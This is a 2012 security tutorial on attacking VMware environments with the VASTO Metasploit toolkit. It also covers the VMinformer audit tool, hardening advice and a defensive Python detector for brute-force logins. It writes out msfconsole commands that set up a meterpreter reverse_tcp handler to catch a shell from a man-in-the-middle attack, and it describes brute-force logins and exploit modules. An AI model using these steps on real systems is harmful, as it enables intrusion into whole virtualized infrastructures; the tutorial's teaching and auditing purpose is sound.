Virtualization Security: Hacking VMware with VASTO

February 16, 2012 by Sudhanshu Chauhan

With the advancement of the technology in the field of computers, requirement for hybrid setups has also escalated. Nowadays every company is using a heterogeneous infrastructure for its variety of tasks. Everybody utilizes a different blend of services, infrastructure and platforms for its operations and service delivery. Sometimes there is a requirement of more than one combination of these technologies; this is where virtualization comes in.

Virtualization can be described as the technique of abstracting physical resources, with the aim of simplification and utilization of the resources with ease. It enhances the capabilities of the present assets of any business and provides easy resources management and utilization, which otherwise would not have been possible. Virtualization can consist of anything from a hardware platform to a storage device or operating system etc. Figure 1 shows a simple hardware level virtualization.


Figure 1. A basic hardware level virtualization

Types of virtualization as described by Wikipedia at http://en.wikipedia.org/wiki/Virtualization are:

Hardware/Platform: Creation of a virtual machine that performs like an original computer with an operating system. The machine on which the virtualization takes place is the host machine and the virtual machine is the guest machine.

Desktop: Concept of separating the logical desktop from the physical machine. The user interacts with the host machine over a network using another device.

Software: OS level virtualization can be described as hosting of multiple virtualization environments within a single OS instance. Application virtualization is hosting of individual applications in an environment separated from the underlying OS. In service virtualization the behavior of dependent system component is emulated.

Memory: Gathering RAM resources from networked systems into a single memory pool.

Storage: Masking logical storage from physical storage.

Data: Presentation of data as an abstract layer.

Network: Creation of a virtualized network addressing space within or across network subnets.

Many factors need to be considered while virtualizing, like storage requirements, processing capabilities, and client cluster size. One thing which should be the top priority is security. Observing the recent trends in the field of computer technology, we can firmly state that cloud computing relies heavily (but not completely) on virtualization. This technology, being used around the globe, brings a serious question before us.

Is virtualization technology really secure, or are we just assuming it to be? Depending upon the cloud architecture, virtualization security can directly lead to cloud security.

People generally think of virtualization security as being the same as OS security; however, it is vastly different. Intrusion into a single operating system will only affect that OS and its user(s), whereas intrusion into the virtualization layer will compromise the whole environment. The intruder will be able to take control of all the virtualized operating systems and hence affect all of their users. The potential threat paths for virtualization are:

  • Guest to Guest
  • Host to Host
  • Guest to Host
  • Host to Guest
  • External to Guest
  • External to Host
    A press release by Gartner (an information technology research and advisory firm), titled "60 Percent of Virtualized Servers Will Be Less Secure Than the Physical Servers They Replace Through 2012", outlines the six most common virtualization security risks. The risks are as follows:

    "Information Security Isn't Initially Involved in the Virtualization Projects

    A Compromise of the Virtualization Layer Could Result in the Compromise of All Hosted Workloads

    The Lack of Visibility and Controls on Internal Virtual Networks Created for VM-to-VM Communications Blinds Existing Security Policy Enforcement Mechanisms

    Workloads of Different Trust Levels Are Consolidated Onto a Single Physical Server Without Sufficient Separation

    Adequate Controls on Administrative Access to the Hypervisor/VMM Layer and to Administrative Tools Are Lacking

    There Is a Potential Loss of Separation of Duties for Network and Security Controls"

    The complete press release can be found at http://www.gartner.com/it/page.jsp?id=1322414.

    Keeping the same problem in mind, Claudio Criscione, a security researcher and consultant, released VASTO. VASTO, or Virtualization Assessment Toolkit, is a first-of-its-kind tool designed with the sole purpose of assessing the security of different virtualization solutions, including VMware, Oracle VM and Xen server. VASTO consists of a set of modules which can easily be integrated into the existing exploitation framework Metasploit. The current version of VASTO is 0.4. The user simply needs to download it from http://vasto.nibblesec.org/VASTO.0.4.zip.

    Figure 2 demonstrates the process. I feel it is better if the user renames the extracted folder to VASTO. Further, the folder needs to be copied recursively (cp -r) into the Metasploit auxiliary directory. The Metasploit framework already contains auxiliary modules for scanning VMware, and VASTO simply expands on them.

    Figure 2. Downloading and extracting the toolkit

    To see all the modules present in VASTO simply input the following command into the msfconsole. The process is demonstrated in Figure 3.


    msf > search vasto


    Figure 3. VASTO modules

    The vmware_version module is a very basic module and provides the functionality to test the version of the VMware application running at the specified addresses or subnet. This is useful for the recon phase of testing. It provides the tester with a clear picture of the testing environment and helps him/her decide to utilize specific exploits (if available). Figure 4 shows the execution of vmware_version module.

    Figure 4. vmware_version module in action (Source: http://www.s3cur1ty.de/vmware-attack-toolkit-vasto)

    After the identification phase, the next best thing to do is to try to log in to the machine using the vmware_login module. This module allows dictionary-based as well as brute-force login attempts and reports each successful login. This single module could allow the tester/intruder to own the machine if strong password policies are not in place.

    Figure 5. Successful login demonstrated using the vmware_login module (Source: http://www.s3cur1ty.de/vmware-attack-toolkit-vasto)
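From the defender's side, the noisy part of a vmware_login run is the burst of rejected logins from one source, followed by a success if a password in the list hits. The following detector is an added example written for this article, not part of VASTO or any VMware product; the log lines are constructed to resemble ESXi hostd authentication messages, and the regex that parses them is an assumption to adapt to the real hostd.log format on your hosts.

```python
"""Detect VMware login brute-force activity in hostd-style auth logs.

Added example for this article (not VASTO or VMware code). The sample log
below is constructed; real hostd.log lines differ by version, so LINE_RE
is an assumption to adjust for your own environment.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: a burst of failures from one source, then a success.
SAMPLE_LOG = """\
2012-02-16T10:00:01Z hostd: Rejected password for user root from 10.0.0.5
2012-02-16T10:00:02Z hostd: Rejected password for user root from 10.0.0.5
2012-02-16T10:00:03Z hostd: Rejected password for user admin from 10.0.0.5
2012-02-16T10:00:04Z hostd: Rejected password for user root from 10.0.0.5
2012-02-16T10:00:05Z hostd: Rejected password for user root from 10.0.0.5
2012-02-16T10:00:06Z hostd: Accepted password for user root from 10.0.0.5
2012-02-16T10:30:00Z hostd: Rejected password for user root from 10.0.0.9
2012-02-16T11:00:00Z hostd: Accepted password for user root from 10.0.0.9
"""

# Assumed line format (adapt to the real hostd.log on your hosts).
LINE_RE = re.compile(
    r"^(?P<ts>\S+) hostd: (?P<result>Accepted|Rejected) password "
    r"for user (?P<user>\S+) from (?P<src>\S+)$"
)

def parse(log_text):
    """Yield (timestamp, result, user, src); lines that do not match are skipped."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
            yield ts, m["result"], m["user"], m["src"]

def find_bruteforce(log_text, threshold=5, window=timedelta(minutes=5)):
    """Return {src: alert} for sources with >= threshold rejected logins inside
    `window`. The alert records whether a later Accepted login from the same
    source followed, i.e. the password guessing apparently succeeded."""
    failures = defaultdict(list)
    alerts = {}
    for ts, result, user, src in parse(log_text):
        if result == "Rejected":
            # Keep only failures still inside the sliding window.
            recent = [t for t in failures[src] if ts - t <= window] + [ts]
            failures[src] = recent
            if len(recent) >= threshold and src not in alerts:
                alerts[src] = {"first": recent[0], "count": len(recent), "compromised": None}
        elif src in alerts and alerts[src]["compromised"] is None:
            alerts[src]["compromised"] = user   # success after a brute-force burst
    return alerts
```

Feed it a real hostd.log (after fixing the regex) and page on any alert whose `compromised` field is set: that is the case where vmware_login would have reported a valid credential.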

    The next attack in the arsenal of VASTO is the lurking attack using the vmware_vilurker module. The dictionary meaning of lurking is to exist unobserved or unsuspected, and that is exactly what this module does.

    The vilurker module can perform user-assisted code execution, provided a Man-in-the-Middle (MITM) attack can be performed on the client.

    A Man-in-the-Middle (MITM) is a kind of attack in which the attacker sits between the victims by making independent connections and relaying messages between them. It's a kind of active eavesdropping. The victims believe that they are interacting directly to each other. The success of this attack depends on the fact that the attacker is successfully able to impersonate each endpoint to the satisfaction of the other. A more detailed description can be found at the OWASP website https://www.owasp.org/index.php/Man-in-the-middle_attack.

    After performing a MITM (using Cain & Abel or ettercap) between the client and the server, the first step in this attack is to start a multi/handler in a second msfconsole. This will be used later to catch the meterpreter reverse_tcp connection. The handler can simply be started by inputting the following commands in the separate msfconsole instance:


    msf > use multi/handler

    msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

    msf exploit(handler) > set LHOST <Local Host IP here>

    msf exploit(handler) > exploit


    Now we need to set the necessary options for the vilurker module in the first Metasploit instance and execute it using the run command. When the client tries to connect to the server, it will encounter a popup, which is actually a meterpreter payload. If the user executes it, the attacker will get a shell in the second msfconsole instance running the handler. Figures 6 and 7 demonstrate the vmware_vilurker module presenting the payload to the client and the resulting shell.

    Figure 6. vmware_vilurker module presenting a meterpreter payload to the user (Source: http://www.s3cur1ty.de/vmware-attack-toolkit-vasto)

    Figure 7. Accessing the shell (Source: http://www.s3cur1ty.de/vmware-attack-toolkit-vasto)

    A list of the modules present in VASTO is as follows:

    abiquo_guest_stealer - Abiquo guest stealer

    abiquo_poison - Abiquo poison

    eucalyptus_bouncer - Eucalyptus Bouncer

    eucalyptus_poison - Eucalyptus Poison

    oraclevm_oravma_fileread - Oracle VM agent remote code execution

    vmware_autopwner - VMautopwn

    vmware_guest_stealer - VMware Guest Stealer

    vmware_login - VMware Login check scanner

    vmware_session_rider - VMware Session Rider

    vmware_studio_upload - VMware Studio Remote Code Execution

    vmware_updatemanager_traversal - Update manager path traversal

    vmware_version - VMware products fingerprinter

    vmware_vilurker - VIlurker VIclient attack

    vmware_webaccess_portscan - VMware Web Access Relay Port Scanner

    xen_login - Xen Login Check Scanner

    oracle_oravma_exec - Oracle VM agent remote code execution

    vmware_sfcbd_exec - VMware VAMI-sfcbd remote code exec

    vmware_tomcat_killer - VMware tomcat killer

    VASTO is a one-of-its-kind toolkit which provides the functionality to audit a virtual environment at all of its layers:

    • Client
    • Hypervisor
    • Support
    • Management
    • Internal

    We hope that it will soon get updated with additional features and exploits to test the virtualization in greater depths.

    Another tool of the trade for virtualization security is VMinformer. VMinformer is not developed from an intruder's point of view, but from a security audit point of view. Unlike VASTO, which provides options for intrusion into the environment, VMinformer allows auditing the environment against security standards. A 14-day trial can be downloaded from http://www.vminformer.com.

    The main aim of VMinformer is to audit a virtual environment using policies. Policies are basically security benchmarks which can be molded according to the requirements. VMinformer generates a report after the audit based on the security / insecurity of the environment.

    VMinformer is simple to install and use. The first step the user needs to perform after the installation is to start a Policy Assessment Wizard, as demonstrated in Figure 8. After the server address and credentials are entered, VMinformer tries to connect to the server. It then provides the option to select the hosts and machines that need to be assessed, and the user inputs the root credentials for them.

    Figure 8. Input the server address and credentials

    Further the user can select the policies he/she wants to use to audit the environment with and start the scan. Once the scan is finished, it displays the results of the audit within the main dashboard.

    Figure 9 displays the interface of the application. The interface is divided into three main parts. The 'Environment' which displays the virtual machines in the environment. The 'Dashboard' which shows the result of the scan. The 'Summary' which presents the information about each issue. The VMinformer dashboard presents the results of the scan in a detailed manner, with a complete description of the issue, the entity involved, the risk level and the remedy.

    Figure 9. VMinformer interface

    After the completion of the assessment process the results can be saved in XML or PDF format. Currently VMinformer supports VMware virtualized OS, but support for other vendors can be expected in the near future. VMinformer provides complete visibility, assurance and control for the virtualization environment.

    VMinformer checks for the presence of:

    • Misconfiguration
    • Missing security patches
    • Bad network scheme
    • Weakness in management layers
    • Storage misconfiguration

    Ensuring secure communication between and with virtual machines is of utmost importance; hence some robust solutions are required. Such solutions are offered by Vyatta, in the form of Linux-based open source software which provides services like routing, intrusion prevention, virtual private networking, load balancing, etc. These virtual firewalls and routers can easily be deployed on top of the hypervisor. Vyatta's enterprise-class SPI (stateful packet inspection) firewall allows us to define and implement access control policies. Remote access to the resources is secured using encryption and authentication mechanisms. It also allows monitoring threats and stopping them. Considering the features and the open source nature of Vyatta Core software (VC), it's a must-have product for every testing and development virtual environment. A copy of the product can be downloaded from http://www.vyatta.org/downloads.


    Virtualization technology provides easy maintenance and utilization of the resources. From the point of view of a pen tester it presents a vast platform where a single intrusion can lead towards the exploitation of a huge environment. Hence there is a need for inspecting virtualization security. Tools like VASTO and VMinformer provide worthy assistance in this direction. Security personnel need to follow some basic guidelines so that they can stop an intruder from taking over their virtualization environment.

    Patch everything: This is one of the basic practices in the field of cyber security, but often ignored. Everything from the virtualization system to the underlying operating systems and the applications running need to be patched regularly.

    Not exposing the test environment to the Internet: Exposing the environment to the open Internet poses a serious threat to the infrastructure, as a vulnerable application might lead to the exploitation of the complete environment. In case of exposure, proper isolation of other environments needs to be done.

    Strong password policies: Persons in charge of the security need to make sure that strong password policies are implemented and followed by employees.

    Education and awareness: It is said that the weakest link in the chain of security is people, hence employees need to be educated and made aware of the best security practices and how to implement them so that an ignorant employee does not lead to a compromised environment.

    Sudhanshu Chauhan

    Sudhanshu Chauhan is a researcher at InfoSec Institute. He is a B.Tech (CSE) graduate from Amity University. His areas of interest include (but are not limited to) Web Application Security and Bypassing Security Measures (IDS/IPS, AV, etc.).